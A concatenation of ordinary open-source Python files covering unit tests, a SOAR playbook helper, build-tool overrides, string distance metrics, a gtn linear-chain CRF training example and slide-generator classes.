('foo.c["inception"][1]', "h"),
('o["n"]', 123),
('o["foo"][1]', "World"),
]
for expression, result in tests:
print(expression)
expression_result = c.eval(expression)
self.assertEqual(expression_result, result)
# expression_result_callable = c.compile(expression)
# self.assertEqual(expression_result_callable(), result)
def test_expression_filter(self):
"""Test filter evaluation"""
c = Context()
c["filter"] = dict(double=lambda v: v * 2, square=lambda v: v * v)
c["data"] = dict(a=1, b=10, c=123)
tests = [
("3|filter.double", 6),
("3|.filter.double", 6),
("data.a + data.b|filter.double", 22),
("(data.a + data.b)|filter.double", 22),
("3|filter.square", 9),
("3|filter.double|filter.square", 36),
]
for expression, result in tests:
print(expression)
expression_result = c.eval(expression)
self.assertEqual(expression_result, result)
# expression_result_callable = c.compile(expression)
# self.assertEqual(expression_result_callable(), result)
def test_expressions_with_fame(self):
"""Test expression evaluation in a frame"""
c = Context()
c["foo"] = dict(a=1, b=2, bar="apples")
c["top"] = 10
c["r"] = list(range(10))
tests = [("a+b", 3), (".top", 10), ("a+.top", 11), (".r.4+.top", 14)]
with c.frame("foo"):
for expression, result in tests:
self.assertEqual(c.eval(expression), result)
def test_set_lazy(self):
"""Test lazy evaluation"""
c = Context()
evaluations = [0]
def add(a, b):
evaluations[0] += 1
return a + b
c.set_lazy("foo", add, 3, 4)
self.assertEqual(evaluations[0], 0)
self.assertEqual(c["foo"], 7)
self.assertEqual(evaluations[0], 1)
self.assertEqual(c["foo"], 7)
self.assertEqual(evaluations[0], 1)
c.set_lazy("bar", lambda: {})
self.assertEqual(c["bar"], {})
def test_set_async(self):
"""Test asyncronous evaluation"""
c = Context()
c.set_async("foo", lambda: "bar")
self.assertEqual(c["foo"], "bar")
self.assertEqual(c["foo"], "bar")
def waiter(wait_time, result):
import time
time.sleep(wait_time)
return result
c.set_async("bestthings", waiter, 0.1, "guiness")
self.assertEqual(c["bestthings"], "guiness")
self.assertEqual(c["bestthings"], "guiness")
def test_set_new(self):
"""Test setting values if not present"""
c = Context()
c.set_new("foo", {})
self.assertEqual(c["foo"], {})
c.set_new("foo", 100)
self.assertEqual(c["foo"], {})
def test_deleting(self):
"""Test deleting from context"""
c = Context()
c["foo"] = {}
c["foo.bar"] = 1
c["foo.baz"] = 2
self.assert_("foo" in c)
self.assert_("foo.bar" in c)
self.assert_("foo.baz" in c)
del c["foo.bar"]
self.assert_("foo" in c)
self.assert_("foo.bar" not in c)
self.assert_("foo.baz" in c)
del c["foo"]
self.assert_("foo" not in c)
self.assert_("foo.bar" not in c)
self.assert_("foo.baz" not in c)
def test_copy_move(self):
"""Test copying and moving values"""
c = Context()
c["foo"] = 123
c["bar"] = {}
c["bar.baz"] = 456
c.copy("foo", "foo2")
self.assertEqual(c["foo"], 123)
self.assertEqual(c["foo2"], 123)
with c.frame("bar"):
c.copy("baz", ".zab")
self.assertEqual(c["zab"], 456)
c = Context()
c["foo"] = 123
c["bar"] = {}
self.assert_("foo" in c)
c.move("foo", "bar.foo")
self.assert_("foo" not in c)
self.assert_("bar.foo" in c)
self.assertEqual(c["bar.foo"], 123)
def test_scope(self):
"""Test scope facility"""
c = Context()
c["foo"] = dict(a=1, b=2)
c["bar"] = {}
c.push_frame(".foo")
self.assertEqual(c["a"], 1)
self.assertEqual(c["b"], 2)
self.assert_("c" not in c)
c.push_scope(".bar")
c[".bar.c"] = 3
self.assert_("c" in c)
self.assertEqual(c["c"], 3)
c.pop_scope()
self.assert_("c" not in c)
self.assertEqual(c["a"], 1)
self.assertEqual(c["b"], 2)
def test_stack(self):
c = Context()
c.push_stack("content", "foo")
self.assertEqual(c[".content"], "foo")
c.push_stack("content", "bar")
self.assertEqual(c[".content"], "bar")
value = c.pop_stack("content")
self.assertEqual(value, "bar")
self.assertEqual(c[".content"], "foo")
value = c.pop_stack("content")
self.assertEqual(value, "foo")
self.assert_(c[".content"] is None)
|
TWE-3/gensim/test/test_corpora.py | sysuhu/topical_word_embeddings | 330 | 11178825 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 <NAME> <<EMAIL>>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated tests for checking corpus I/O formats (the corpora package).
"""
import logging
import os.path
import unittest
import tempfile
import itertools
from gensim.corpora import (bleicorpus, mmcorpus, lowcorpus, svmlightcorpus,
ucicorpus, malletcorpus, textcorpus)
# needed because sample data files are located in the same folder
module_path = os.path.dirname(__file__)
datapath = lambda fname: os.path.join(module_path, 'test_data', fname)
def testfile():
# temporary data will be stored to this file
return os.path.join(tempfile.gettempdir(), 'gensim_corpus.tst')
class CorpusTestCase(unittest.TestCase):
TEST_CORPUS = [[(1, 1.0)], [], [(0, 0.5), (2, 1.0)], []]
def run(self, result=None):
if type(self) is not CorpusTestCase:
super(CorpusTestCase, self).run(result)
def tearDown(self):
# remove all temporary test files
fname = testfile()
extensions = ['', '', '.bz2', '.gz', '.index', '.vocab']
for ext in itertools.permutations(extensions, 2):
try:
os.remove(fname + ext[0] + ext[1])
except OSError:
pass
def test_load(self):
fname = datapath('testcorpus.' + self.file_extension.lstrip('.'))
corpus = self.corpus_class(fname)
docs = list(corpus)
# the deerwester corpus always has nine documents
self.assertEqual(len(docs), 9)
def test_empty_input(self):
with open(testfile(), 'w') as f:
f.write('')
with open(testfile() + '.vocab', 'w') as f:
f.write('')
corpus = self.corpus_class(testfile())
self.assertEqual(len(corpus), 0)
docs = list(corpus)
self.assertEqual(len(docs), 0)
def test_save(self):
corpus = self.TEST_CORPUS
# make sure the corpus can be saved
self.corpus_class.save_corpus(testfile(), corpus)
# and loaded back, resulting in exactly the same corpus
corpus2 = list(self.corpus_class(testfile()))
self.assertEqual(corpus, corpus2)
def test_serialize(self):
corpus = self.TEST_CORPUS
# make sure the corpus can be saved
self.corpus_class.serialize(testfile(), corpus)
# and loaded back, resulting in exactly the same corpus
corpus2 = self.corpus_class(testfile())
self.assertEqual(corpus, list(corpus2))
# make sure the indexing corpus[i] works
for i in range(len(corpus)):
self.assertEqual(corpus[i], corpus2[i])
def test_serialize_compressed(self):
corpus = self.TEST_CORPUS
for extension in ['.gz', '.bz2']:
fname = testfile() + extension
# make sure the corpus can be saved
self.corpus_class.serialize(fname, corpus)
# and loaded back, resulting in exactly the same corpus
corpus2 = self.corpus_class(fname)
self.assertEqual(corpus, list(corpus2))
# make sure the indexing `corpus[i]` syntax works
for i in range(len(corpus)):
self.assertEqual(corpus[i], corpus2[i])
# endclass CorpusTestCase
class TestMmCorpus(CorpusTestCase):
def setUp(self):
self.corpus_class = mmcorpus.MmCorpus
self.file_extension = '.mm'
def test_serialize_compressed(self):
# MmCorpus needs file write with seek => doesn't support compressed output (only input)
pass
# endclass TestMmCorpus
class TestSvmLightCorpus(CorpusTestCase):
def setUp(self):
self.corpus_class = svmlightcorpus.SvmLightCorpus
self.file_extension = '.svmlight'
# endclass TestSvmLightCorpus
class TestBleiCorpus(CorpusTestCase):
def setUp(self):
self.corpus_class = bleicorpus.BleiCorpus
self.file_extension = '.blei'
# endclass TestBleiCorpus
class TestLowCorpus(CorpusTestCase):
TEST_CORPUS = [[(1, 1)], [], [(0, 2), (2, 1)], []]
def setUp(self):
self.corpus_class = lowcorpus.LowCorpus
self.file_extension = '.low'
# endclass TestLowCorpus
class TestUciCorpus(CorpusTestCase):
TEST_CORPUS = [[(1, 1)], [], [(0, 2), (2, 1)], []]
def setUp(self):
self.corpus_class = ucicorpus.UciCorpus
self.file_extension = '.uci'
def test_serialize_compressed(self):
# UciCorpus needs file write with seek => doesn't support compressed output (only input)
pass
# endclass TestUciCorpus
class TestMalletCorpus(CorpusTestCase):
TEST_CORPUS = [[(1, 1)], [], [(0, 2), (2, 1)], []]
def setUp(self):
self.corpus_class = malletcorpus.MalletCorpus
self.file_extension = '.mallet'
def test_load_with_metadata(self):
fname = datapath('testcorpus.' + self.file_extension.lstrip('.'))
corpus = self.corpus_class(fname)
corpus.metadata = True
self.assertEqual(len(corpus), 9)
docs = list(corpus)
self.assertEqual(len(docs), 9)
for i, docmeta in enumerate(docs):
doc, metadata = docmeta
self.assertEqual(metadata[0], str(i + 1))
self.assertEqual(metadata[1], 'en')
# endclass TestMalletCorpus
class TestTextCorpus(CorpusTestCase):
def setUp(self):
self.corpus_class = textcorpus.TextCorpus
self.file_extension = '.txt'
def test_load_with_metadata(self):
fname = datapath('testcorpus.' + self.file_extension.lstrip('.'))
corpus = self.corpus_class(fname)
corpus.metadata = True
self.assertEqual(len(corpus), 9)
docs = list(corpus)
self.assertEqual(len(docs), 9)
for i, docmeta in enumerate(docs):
doc, metadata = docmeta
self.assertEqual(metadata[0], i)
def test_save(self):
pass
def test_serialize(self):
pass
def test_serialize_compressed(self):
pass
# endclass TestTextCorpus
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
unittest.main()
|
playbooks/custom_functions/custom_list_enumerate.py | arjunkhunti-crest/security_content | 348 | 11178829 | def custom_list_enumerate(custom_list=None, **kwargs):
"""
Fetch a custom list and iterate through the rows, producing a dictionary output for each row with the row number and the value for each column.
Args:
custom_list: the name or ID of a custom list
Returns a JSON-serializable object that implements the configured data paths:
*.row_num
*.column_0
*.column_1
*.column_2
*.column_3
*.column_4
*.column_5
*.column_6
*.column_7
*.column_8
"""
############################ Custom Code Goes Below This Line #################################
import json
import phantom.rules as phantom
if not custom_list:
        raise ValueError('custom_list parameter is required')
outputs = []
# Use REST to get the custom list
custom_list_request = phantom.requests.get(
phantom.build_phantom_rest_url('decided_list', custom_list),
verify=False
)
# Raise error if unsuccessful
custom_list_request.raise_for_status()
# Get the list content
custom_list = custom_list_request.json().get('content', [])
# Iterate through all rows and save to a list of dicts
for row_num, row in enumerate(custom_list):
row_dict = {'column_{}'.format(col): val for col, val in enumerate(row)}
row_dict['row_num'] = row_num
outputs.append(row_dict)
# Return a JSON-serializable object
assert json.dumps(outputs) # Will raise an exception if the :outputs: object is not JSON-serializable
return outputs
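# Hedged usage sketch from a playbook block (the list name "blocked_ips" is
# hypothetical):
#
#   for row in custom_list_enumerate(custom_list="blocked_ips"):
#       phantom.debug("row {}: {}".format(row["row_num"], row.get("column_0")))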
|
SCons/Tool/ninja/Overrides.py | jcassagnol-public/scons | 1,403 | 11178846 | <gh_stars>1000+
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
This module is to hold logic which overrides default SCons behaviors to enable
ninja file generation
"""
import SCons
def ninja_hack_linkcom(env):
# TODO: change LINKCOM and SHLINKCOM to handle embedding manifest exe checks
# without relying on the SCons hacks that SCons uses by default.
if env["PLATFORM"] == "win32":
from SCons.Tool.mslink import compositeLinkAction
if env.get("LINKCOM", None) == compositeLinkAction:
env[
"LINKCOM"
] = '${TEMPFILE("$LINK $LINKFLAGS /OUT:$TARGET.windows $_LIBDIRFLAGS $_LIBFLAGS $_PDB $SOURCES.windows", "$LINKCOMSTR")}'
env[
"SHLINKCOM"
] = '${TEMPFILE("$SHLINK $SHLINKFLAGS $_SHLINK_TARGETS $_LIBDIRFLAGS $_LIBFLAGS $_PDB $_SHLINK_SOURCES", "$SHLINKCOMSTR")}'
def ninja_hack_arcom(env):
"""
Force ARCOM so use 's' flag on ar instead of separately running ranlib
"""
if env["PLATFORM"] != "win32" and env.get("RANLIBCOM"):
# There is no way to translate the ranlib list action into
# Ninja so add the s flag and disable ranlib.
#
# This is equivalent to Meson.
# https://github.com/mesonbuild/meson/blob/master/mesonbuild/linkers.py#L143
old_arflags = str(env["ARFLAGS"])
if "s" not in old_arflags:
old_arflags += "s"
env["ARFLAGS"] = SCons.Util.CLVar([old_arflags])
# Disable running ranlib, since we added 's' above
env["RANLIBCOM"] = ""
class NinjaNoResponseFiles(SCons.Platform.TempFileMunge):
"""Overwrite the __call__ method of SCons' TempFileMunge to not delete."""
def __call__(self, target, source, env, for_signature):
return self.cmd
def _print_cmd_str(*_args, **_kwargs):
"""Disable this method"""
pass
def ninja_always_serial(self, num, taskmaster):
"""Replacement for SCons.Job.Jobs constructor which always uses the Serial Job class."""
# We still set self.num_jobs to num even though it's a lie. The
# only consumer of this attribute is the Parallel Job class AND
# the Main.py function which instantiates a Jobs class. It checks
# if Jobs.num_jobs is equal to options.num_jobs, so if the user
# provides -j12 but we set self.num_jobs = 1 they get an incorrect
# warning about this version of Python not supporting parallel
# builds. So here we lie so the Main.py will not give a false
# warning to users.
self.num_jobs = num
self.job = SCons.Job.Serial(taskmaster)
# pylint: disable=too-few-public-methods
class AlwaysExecAction(SCons.Action.FunctionAction):
"""Override FunctionAction.__call__ to always execute."""
def __call__(self, *args, **kwargs):
kwargs["execute"] = 1
return super().__call__(*args, **kwargs)
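# Hedged sketch of how the ninja tool is expected to wire these overrides in
# (exact hook points may differ between SCons versions):
#
#   import SCons.Job
#   SCons.Job.Jobs.__init__ = ninja_always_serial   # always use the Serial job class
#   env["TEMPFILE"] = NinjaNoResponseFiles          # emit full command lines, no response files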
|
quantdsl/domain/model/call_dependents.py | johnbywater/quantdsl | 269 | 11178853 | from eventsourcing.domain.model.entity import EventSourcedEntity, EntityRepository
from eventsourcing.domain.model.events import publish
class CallDependents(EventSourcedEntity):
"""
Call dependents are the calls that are waiting for this call to be evaluated.
The number of dependents will be the number of reuses of this call from the call
cache. Looking at the call dependents therefore gives a good idea of whether
recombination in a lattice is working properly.
"""
class Created(EventSourcedEntity.Created):
pass
class Discarded(EventSourcedEntity.Discarded):
pass
def __init__(self, dependents, **kwargs):
super(CallDependents, self).__init__(**kwargs)
self._dependents = dependents
def __getitem__(self, item):
return self._dependents.__getitem__(item)
@property
def dependents(self):
return self._dependents
def register_call_dependents(call_id, dependents):
created_event = CallDependents.Created(entity_id=call_id, dependents=dependents)
call_dependents = CallDependents.mutator(event=created_event)
# print("Number of call dependents:", len(dependents))
publish(created_event)
return call_dependents
class CallDependentsRepository(EntityRepository):
pass
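# Hedged usage sketch (the IDs are hypothetical UUIDs):
#
#   entity = register_call_dependents(call_id, dependents=[dep_a, dep_b])
#   assert entity.dependents == [dep_a, dep_b]
#   assert entity[0] == dep_a   # __getitem__ delegates to the dependents list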
|
tests/test_injectable_marker.py | wetgi/lagom | 109 | 11178875 | <filename>tests/test_injectable_marker.py<gh_stars>100-1000
from copy import deepcopy
import pytest
from lagom import injectable
from lagom.exceptions import InjectableNotResolved
def test_injectable_is_falsy():
assert not injectable
def test_trying_to_reference_a_property_on_injectable_raises_an_error():
with pytest.raises(InjectableNotResolved):
injectable.some_value # type: ignore
def test_trying_to_call_things_on_injectable_raises_an_error():
with pytest.raises(InjectableNotResolved):
injectable.do_thing() # type: ignore
def test_cloning_injectable_is_the_same_injectable():
assert injectable is deepcopy(injectable)
|
images/merge-svgs.py | ragerdl/dtrace-stap-book | 139 | 11178876 | <filename>images/merge-svgs.py
import os
import sys
import xml.etree.ElementTree as etree
NAMESPACES = {
'': 'http://www.w3.org/2000/svg',
'xlink': 'http://www.w3.org/1999/xlink',
'sodipodi': 'http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd',
'inkscape': 'http://www.inkscape.org/namespaces/inkscape'
}
def _xml_tag(tag, ns=''):
return '{{{0}}}{1}'.format(NAMESPACES[ns], tag)
# Parse args and process
target = sys.argv[1]
source = sys.argv[2]
extrasvgs = dict((os.path.basename(fname), fname)
for fname in sys.argv[3:])
for ns, uri in NAMESPACES.items():
etree.register_namespace(ns, uri)
# Parse main image
tree = etree.parse(source)
root = tree.getroot()
for group in root.findall('.//' + _xml_tag('g')):
use = group.find(_xml_tag('use'))
if use is None:
continue
href = use.attrib[_xml_tag('href', 'xlink')]
if href not in extrasvgs:
raise ValueError('Invalid use reference {0}'.format(href))
group.clear()
# Read sub svg
extrasvg = etree.parse(extrasvgs[href]).getroot()
extragroup = extrasvg.find(_xml_tag('g'))
if extragroup is not None:
group.extend(extragroup)
tree.write(target)
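# Invocation sketch (argument order per the sys.argv parsing above; the
# filenames are hypothetical):
#   python merge-svgs.py merged.svg main.svg part-a.svg part-b.svg
|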
src/uvm/dap/uvm_set_get_dap_base.py | rodrigomelo9/uvm-python | 140 | 11178911 | <reponame>rodrigomelo9/uvm-python
#//
#//------------------------------------------------------------------------------
#// Copyright 2007-2011 Mentor Graphics Corporation
#// Copyright 2007-2011 Cadence Design Systems, Inc.
#// Copyright 2010-2011 Synopsys, Inc.
#// Copyright 2013 NVIDIA Corporation
#// All Rights Reserved Worldwide
#//
#// Licensed under the Apache License, Version 2.0 (the
#// "License"); you may not use this file except in
#// compliance with the License. You may obtain a copy of
#// the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in
#// writing, software distributed under the License is
#// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
#// CONDITIONS OF ANY KIND, either express or implied. See
#// the License for the specific language governing
#// permissions and limitations under the License.
#//------------------------------------------------------------------------------
from ..base.uvm_object import UVMObject
#// Class: uvm_set_get_dap_base
#// Provides the 'set' and 'get' interface for Data Access Policies (DAPs)
#//
#// The 'Set/Get' base class simply provides a common interface for
#// the various DAPs to implement. This provides a mechanism for
#// consistent implementations of similar DAPs.
#//
#virtual class uvm_set_get_dap_base#(type T=int) extends uvm_object;
class uvm_set_get_dap_base(UVMObject):
def __init__(self, name="unnamed-uvm_set_get_dap_base#(T)"):
UVMObject.__init__(self, name)
# // Group: Set/Get Interface
# //
# // All implementations of the ~uvm_set_get_dap_base~ class must
# // provide an implementation of the four basic "Set and Get"
# // accessors.
# //
# // Function: set
# // Sets the value contained within the resource.
# //
# // Depending on the DAP policies, an error may be reported if
# // it is illegal to 'set' the value at this time.
# pure virtual function void set(T value);
def set(self, value):
raise NotImplementedError('Pure virtual function')
# // Function: try_set
# // Attempts to set the value contained within the resource.
# //
# // If the DAP policies forbid setting at this time, then
# // the method will return 0, however no errors will be
# // reported. Otherwise, the method will return 1, and
# // will be treated like a standard <set> call.
# pure virtual function bit try_set(T value);
def try_set(self, value):
raise NotImplementedError('Pure virtual function')
# // Function: get
# // Retrieves the value contained within the resource.
# //
# // Depending on the DAP policies, an error may be reported
# // if it is illegal to 'get' the value at this time.
# pure virtual function T get();
def get(self):
raise NotImplementedError('Pure virtual function')
# // Function: try_get
# // Attempts to retrieve the value contained within the resource.
# //
# // If the DAP policies forbid retrieving at this time, then
# // the method will return 0, however no errors will be
# // reported. Otherwise, the method will return 1, and will
# // be treated like a standard <get> call.
# pure virtual function bit try_get(output T value);
def try_get(self, value):
raise NotImplementedError('Pure virtual function')
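# A minimal sketch of a concrete subclass with no access restrictions; the
# name 'uvm_simple_dap' is hypothetical and not part of the original UVM
# sources, and the list-based output argument in try_get() follows the
# uvm-python convention assumed here.
class uvm_simple_dap(uvm_set_get_dap_base):
    def __init__(self, name="uvm_simple_dap"):
        uvm_set_get_dap_base.__init__(self, name)
        self.m_value = None
    def set(self, value):
        # Setting is always legal in this sketch
        self.m_value = value
    def try_set(self, value):
        self.set(value)
        return 1
    def get(self):
        return self.m_value
    def try_get(self, value):
        # 'value' is assumed to be a list used as an output argument
        value.append(self.m_value)
        return 1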
|
textdistance/algorithms/vector_based.py | juliangilbey/textdistance | 1,401 | 11178984 |
"""
IMPORTANT: it's just a draft
"""
# built-in
from functools import reduce
# app
from .base import Base as _Base, BaseSimilarity as _BaseSimilarity
try:
import numpy
except ImportError:
numpy = None
class Chebyshev(_Base):
def _numpy(self, s1, s2):
s1, s2 = numpy.asarray(s1), numpy.asarray(s2)
return max(abs(s1 - s2))
def _pure(self, s1, s2):
return max(abs(e1 - e2) for e1, e2 in zip(s1, s2))
def __call__(self, s1, s2):
if numpy:
return self._numpy(s1, s2)
else:
return self._pure(s1, s2)
class Minkowski(_Base):
def __init__(self, p=1, weight=1):
if p < 1:
raise ValueError('p must be at least 1')
self.p = p
self.weight = weight
def _numpy(self, s1, s2):
s1, s2 = numpy.asarray(s1), numpy.asarray(s2)
result = (self.weight * abs(s1 - s2)) ** self.p
return result.sum() ** (1.0 / self.p)
def _pure(self, s1, s2):
result = (self.weight * abs(e1 - e2) for e1, e2 in zip(s1, s2))
result = sum(e ** self.p for e in result)
return result ** (1.0 / self.p)
def __call__(self, s1, s2):
if numpy:
return self._numpy(s1, s2)
else:
return self._pure(s1, s2)
class Manhattan(_Base):
def __call__(self, s1, s2):
raise NotImplementedError
class Euclidean(_Base):
def __init__(self, squared=False):
self.squared = squared
def _numpy(self, s1, s2):
s1 = numpy.asarray(s1)
s2 = numpy.asarray(s2)
q = numpy.matrix(s1 - s2)
result = (q * q.T).sum()
if self.squared:
return result
return numpy.sqrt(result)
def _pure(self, s1, s2):
raise NotImplementedError
def __call__(self, s1, s2):
if numpy:
return self._numpy(s1, s2)
else:
return self._pure(s1, s2)
class Mahalanobis(_Base):
def __call__(self, s1, s2):
raise NotImplementedError
class Correlation(_BaseSimilarity):
def _numpy(self, *sequences):
sequences = [numpy.asarray(s) for s in sequences]
ssm = [s - s.mean() for s in sequences]
result = reduce(numpy.dot, sequences)
for sm in ssm:
result /= numpy.sqrt(numpy.dot(sm, sm))
return result
def _pure(self, *sequences):
raise NotImplementedError
def __call__(self, *sequences):
if numpy:
return self._numpy(*sequences)
else:
return self._pure(*sequences)
class Kulsinski(_BaseSimilarity):
def __call__(self, s1, s2):
raise NotImplementedError
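# A minimal usage sketch of the metrics implemented above; the inputs are
# illustrative numeric sequences of equal length.
if __name__ == '__main__':
    print(Chebyshev()([1, 2, 3], [4, 6, 5]))        # 4: max of |e1 - e2|
    print(Minkowski(p=2)([0, 0], [3, 4]))           # 5.0: Euclidean case of L_p
    print(Euclidean(squared=True)([0, 0], [3, 4]))  # 25 (requires numpy)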
|
bindings/python/examples/linear_crf.py | shubho/gtn | 478 | 11179054 | #!/usr/bin/env python3
"""
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
import gtn
import numpy as np
def gen_transitions(num_classes, calc_grad=False):
"""Make a bigram transition graph."""
g = gtn.Graph(calc_grad)
for i in range(num_classes):
g.add_node(False, True)
g.add_node(True, True)
for i in range(num_classes):
g.add_arc(num_classes, i, i) # s(<s>, i)
for j in range(num_classes):
g.add_arc(i, j, j) # s(i, j)
return g
def gen_potentials(num_features, num_classes, calc_grad=False):
"""Make the unary potential graph"""
g = gtn.Graph(calc_grad)
g.add_node(True, True)
for i in range(num_features):
for c in range(num_classes):
g.add_arc(0, 0, i, c) # f(i, c)
return g
def gen_model(num_features, num_classes, calc_grad=False, init=True):
transitions = gen_transitions(num_classes, calc_grad)
potentials = gen_potentials(num_features, num_classes, calc_grad)
# Randomly set the arc weights of the graphs:
if init:
transitions.set_weights(
10 * np.random.randn(transitions.num_arcs()))
potentials.set_weights(
10 * np.random.randn(potentials.num_arcs()))
return potentials, transitions
def make_chain_graph(seq, calc_grad=False):
"""Make a simple chain graph from an iterable of integers."""
g = gtn.Graph(calc_grad)
g.add_node(True)
for e, s in enumerate(seq):
g.add_node(False, e + 1 == len(seq))
g.add_arc(e, e + 1, s)
return g
def sample_model(
num_features, num_classes,
potentials, transitions,
num_samples, max_len=20):
"""
Sample `num_samples` from a linear-chain CRF specified
by a `potentials` graph and a `transitions` graph. The
samples will have a random length in `[1, max_len]`.
"""
model = gtn.compose(potentials, transitions)
# Draw a random X with length randomly from [1, max_len] and find the
# most likely Y under the model:
samples = []
while len(samples) < num_samples:
# Sample X:
T = np.random.randint(1, max_len + 1)
X = np.random.randint(0, num_features, size=(T,))
X = make_chain_graph(X)
# Find the most likely Y given X:
Y = gtn.viterbi_path(gtn.compose(X, model))
# Clean up Y:
Y = gtn.project_output(Y)
Y.set_weights(np.zeros(Y.num_arcs()))
samples.append((X, Y))
return samples
def crf_loss(X, Y, potentials, transitions):
feature_graph = gtn.compose(X, potentials)
# Compute the unnormalized score of `(X, Y)`
target_graph = gtn.compose(feature_graph, gtn.intersect(Y, transitions))
target_score = gtn.forward_score(target_graph)
# Compute the partition function
norm_graph = gtn.compose(feature_graph, transitions)
norm_score = gtn.forward_score(norm_graph)
return gtn.subtract(norm_score, target_score)
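# Note: for a linear-chain CRF the negative log-likelihood of a pair (X, Y) is
#   L(X, Y) = log Z(X) - score(X, Y)
# where score(X, Y) sums the unary potentials f(x_t, y_t) and the transition
# scores s(y_{t-1}, y_t) along the path Y, and the partition function Z(X)
# sums exp(score) over all label sequences. The two forward_score calls above
# compute exactly these two log-sum-exp terms on the composed graphs, and
# gtn.subtract forms their difference.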
def update_params(learning_rate, *graphs):
"""Take a gradient step on each graph in `graphs`."""
for graph in graphs:
params = graph.weights_to_numpy()
grad = graph.grad().weights_to_numpy()
params += learning_rate * grad
graph.set_weights(params)
def sampler(dataset):
"""Iterator which randomly samples from a dataset."""
while True:
indices = np.random.permutation(len(dataset))
for idx in indices:
yield dataset[idx]
def main():
num_features = 3 # number of input features
num_classes = 2 # number of output classes
num_train = 1000 # size of the training set
num_test = 200 # size of the testing set
# Setup ground-truth model:
gt_potentials, gt_transitions = gen_model(num_features, num_classes)
# Sample training and test datasets:
samples = sample_model(
num_features, num_classes,
gt_potentials, gt_transitions,
num_train + num_test)
train, test = samples[:num_train], samples[num_train:]
print(f"Using {len(train)} samples for the training set")
print(f"Using {len(test)} samples for the test set")
# Make the graphs for learning:
potentials, transitions = gen_model(
num_features, num_classes, calc_grad=True, init=False)
print("Unary potential graph has {} nodes and {} arcs".format(
potentials.num_nodes(), potentials.num_arcs()))
print("Transition graph has {} nodes and {} arcs".format(
transitions.num_nodes(), transitions.num_arcs()))
# Run the SGD loop:
learning_rate = 1e-2
max_iter = 10000
losses = []
for it, (X, Y) in enumerate(sampler(train)):
# Compute the loss and take a gradient step:
loss = crf_loss(X, Y, potentials, transitions)
gtn.backward(loss)
update_params(-learning_rate, potentials, transitions)
# Clear the gradients:
transitions.zero_grad()
potentials.zero_grad()
losses.append(loss.item())
if (it + 1) % 1000 == 0:
print("=" * 50)
print(f"Iteration {it + 1}, Avg. Loss {np.mean(losses):.3f}")
losses = []
if it == max_iter:
break
# Evaluate on the test set:
correct = 0.0
total = 0
for X, Y in test:
full_graph = gtn.compose(gtn.compose(X, potentials), transitions)
prediction = gtn.viterbi_path(full_graph).labels_to_list(False)
correct += np.sum(np.array(Y.labels_to_list()) == prediction)
total += len(prediction)
print("Test: Accuracy {:.3f}".format(correct / total))
if __name__ == "__main__":
main()
|
talkgenerator/slide/slide_generator_types.py | korymath/talk-generator | 110 | 11179060 |
import logging
from abc import ABCMeta
from abc import abstractmethod
from talkgenerator.slide import slides
from talkgenerator.util import generator_util
logger = logging.getLogger("talkgenerator")
class SlideGenerator(metaclass=ABCMeta):
""" Generating Slide objects using a list of generators """
def __init__(self, slide_content_generator):
""" The given content_providers is a function that when called,
generates all of the arguments for the slide creator"""
self._slide_content_generator = slide_content_generator
@property
@abstractmethod
def slide_type(self):
""" The function converting it to a Slide object """
pass
@classmethod
def of(cls, *generators):
return cls(CombinedSlideGenerator(*generators))
def generate_slide(self, presentation_context, used) -> (slides.Slide, list):
""" Generates the slide using the given generators."""
logger.debug('slide_generator_types.generate_slide')
logger.debug('presentation_context: {}'.format(presentation_context))
logger.debug('self._slide_content_generator: {}'.format(self._slide_content_generator))
generated = self._slide_content_generator(presentation_context)
logger.debug('generated: {}'.format(generated))
if is_different_enough(generated, used):
return self.slide_type(*generated), generated
class TitleSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(cls, title_generator, subtitle_generator):
return cls(CombinedSlideGenerator(title_generator, subtitle_generator))
@property
def slide_type(self):
return slides.TitleSlide
class LarqeQuoteSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(cls, title_generator, text_generator, background_image_generator):
return cls(
CombinedSlideGenerator(
title_generator, text_generator, background_image_generator
)
)
@property
def slide_type(self):
return slides.LarqeQuoteSlide
class ImageSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(cls, title_generator, image_generator=None, original_image_size=True):
return cls(
CombinedSlideGenerator(
title_generator,
image_generator,
generator_util.StaticGenerator(original_image_size),
)
)
@classmethod
def of_tupled_captioned_image(cls, tuple_1_generator, original_image_size=True):
return cls(
TupledCaptionedImageGenerator(tuple_1_generator, original_image_size)
)
@property
def slide_type(self):
return slides.ImageSlide
class TupledCaptionedImageGenerator(object):
def __init__(self, tuple_1_generator, original_image_size=True):
self._tuple_1_generator = tuple_1_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
generated_tuple_1 = self._tuple_1_generator(presentation_context)
return generated_tuple_1[0], generated_tuple_1[1], self._original_image_size
class FullImageSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
